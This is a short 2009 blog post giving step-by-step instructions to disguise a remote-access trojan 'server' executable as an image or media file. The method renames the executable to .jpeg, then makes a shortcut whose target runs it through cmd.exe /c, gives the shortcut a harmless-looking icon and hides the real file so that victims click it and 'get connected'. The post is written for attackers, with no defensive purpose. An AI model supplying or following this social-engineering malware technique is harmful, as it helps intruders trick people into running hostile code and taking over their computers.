Monday, November 23, 2009
1. Firstly, create a new folder and make sure that the options 'show hidden files' is checked and ‘hide extensions for known file types’ is unchecked. Basically what u need is to see hidden files and see the extension of all your files on your pc.
2. Paste a copy of your server on the new created folder. let's say it's called server.exe (that's why you need the extension of files showing, cause you need to see it to change it)
3. Now you’re going to rename this server.exe to whatever you want, let’s say for example picture.jpeg
4. Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.
5. Now create a shortcut of this picture.jpeg in the same folder.
6. Now that you have a shortcut, rename it to whatever you want, for example, me.jpeg.
7. Go to properties (on file me.jpeg) and now you need to do some changes there.
8. First of all delete all the text on field START IN and leave it empty.
9. Then on field TARGET you need to write the path to open the other file (the server renamed picture.jpeg) so u have to write this: C:\WINDOWS\system32\cmd.exe /c picture.jpeg
10. The last field, c picture.jpeg is always the name of the first file. If you called the first file soccer.avi you gotta write C:\WINDOWS\system32\cmd.exe /c soccer.avi got it?
11. So what you’re doing is when someone clicks on me.jpeg, a cmd will execute the other file picture.jpeg and the server will run.
12. On that file me.jpeg (shortcut), go to properties and you have an option to change the icon. click that and a new window will pop up and u have to write this: %SystemRoot%\system32\SHELL32.dll . Then press OK.
13. You can set the properties HIDDEN for the first file (picture.jpeg) if you think it’s better to get a connection from someone.
14. But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.
This method can be applied to ANYTHING....Just use the imagination,mp3, etc etc
Posted by Upul at 8:32 AM